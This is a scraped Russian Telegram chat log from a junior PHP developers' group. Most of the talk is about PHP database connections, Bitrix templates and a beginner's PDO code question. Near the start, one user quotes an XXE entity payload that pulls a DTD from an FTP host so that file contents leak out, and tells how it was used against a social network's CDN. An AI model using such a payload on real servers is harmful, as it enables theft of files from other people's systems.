В рейтинге участвует:

групп:

каналов:

Виртуальный сервер на SSD - недорого!

Аренда выделенных и виртуальных серверов (VDS/VPS), хостинг, аренда IP-адресов, администрирование, круглосуточная поддержка

qwarta.ru подробнее

Резервное копирование с проверкой на вирусы!!!

Удобный сервис создания резервных копий на любой сервер сети интернет. Отслеживайте изменения, проверяйте на вирусы. Надежно защитите свой бизнес!

go.backupland.com

Выбираете сервер? Любая конфигурация на заказ!

Аренда физических серверов любых конфигураций под любые запросы - 1С бухгалтерия, игровые сервера, нагруженные проекты, интернет-магазины!

qwarta.ru подробнее

Size: a a a

phpGeeksJunior

1532 membersпожаловаться на группу
2020 January 15

S

SarcasmIO in phpGeeksJunior
XXE где можно было свободно гулять по файлам cdn вконтача
им передали xml с вот такой шнягой <!ENTITY % c "<!ENTITY &#37; rrr SYSTEM 'ftp://some.site/%b;'>">%c;
ну крч говоря, это уже слишком внутряки
источник
01:23пожаловаться#1

S

SarcasmIO in phpGeeksJunior
эта шняга сама тебе на 21-й порт будет ходить с dtd а тебе останется только с dnschef смотреть логи
источник
01:24пожаловаться#2

S

SarcasmIO in phpGeeksJunior
а все из-за жб/ютрека
источник
01:24пожаловаться#3

V

Vladimir in phpGeeksJunior
SarcasmIO
в большинстве случаев, ты енивей будешь уязвим но жив и цел, пока превалируемый профит явно меньше трудозатрат, но показывать наружу кишки, а самый просто способ получить path traversal как раз что то зааплодить, допустим написать новость на новостной сайт и получить картинку с, uploads/images/123.jpg допустим
Помню недавно в чатике юи какой-то чел писал что у них переопределенная схема бд каждого клиента свой коннект, приложение отключается после коннекта и код сверяется с тем что на специальном диске...
источник
02:12пожаловаться#4

S

SarcasmIO in phpGeeksJunior
пхп с базой впринципе боль
источник
02:12пожаловаться#5

S

SarcasmIO in phpGeeksJunior
они не могут юзать пул коннектов
источник
02:12пожаловаться#6

S

SarcasmIO in phpGeeksJunior
типо HikariCP и тд
источник
02:12пожаловаться#7

S

SarcasmIO in phpGeeksJunior
лан ,сорян шо был слегка грубоват
источник
02:13пожаловаться#8

V

Vladimir in phpGeeksJunior
SarcasmIO
лан ,сорян шо был слегка грубоват
Да ничего
источник
02:13пожаловаться#9

V

Vladimir in phpGeeksJunior
Сорян если я тоже херню сморозил
источник
02:13пожаловаться#10

V

Vladimir in phpGeeksJunior
Имена файлов тоже конечно лучше менять, да и вообще все что известно дырявое лучше попробовать убрать..
источник
02:14пожаловаться#11

Т

Танос in phpGeeksJunior
Всем здравия. Кто работал с битриксом? Как подрубить свой js   скрипт к опросу?
источник
12:43пожаловаться#12

K

Konstantin in phpGeeksJunior
Танос
Всем здравия. Кто работал с битриксом? Как подрубить свой js   скрипт к опросу?
Копируешь шаблон из кода компанента в папку темплейт, суешь в него свой жс
источник
12:52пожаловаться#13

Т

Танос in phpGeeksJunior
Konstantin
Копируешь шаблон из кода компанента в папку темплейт, суешь в него свой жс
Благодарю, попробую
источник
12:53пожаловаться#14

e

elvis in phpGeeksJunior
PowerAxis
наркоман штоле?
Что так сразу?
источник
15:51пожаловаться#15

in phpGeeksJunior
elvis
привет, кто-то знает как это работает? phpdbg_color
https://www.php.net/manual/ru/function.phpdbg-color.php
это команда для работы в командной строке?
Это функция пхп как и другие на этом сайте
источник
15:54пожаловаться#16

Р

Рамаз in phpGeeksJunior
Всем приве может кто подскажет где ошибка в коде, есть один файл с подключение к БД
источник
17:50пожаловаться#17

Р

Рамаз in phpGeeksJunior
<?php
 require_once 'connect.php';

   $sql = "SELECT * FROM romzess722";
   $statement = $pdo->prepare($sql);
   $statement->execute();
   $shops = $statement->fetchALL(PDO::FETCH_ASSOC);

   include 'show.php';

 
?>
источник
17:50пожаловаться#18

Р

Рамаз in phpGeeksJunior
который подключает второй через  include 'show.php';
источник
17:51пожаловаться#19

M

Maestro in phpGeeksJunior
ошибка какая
источник
17:51пожаловаться#20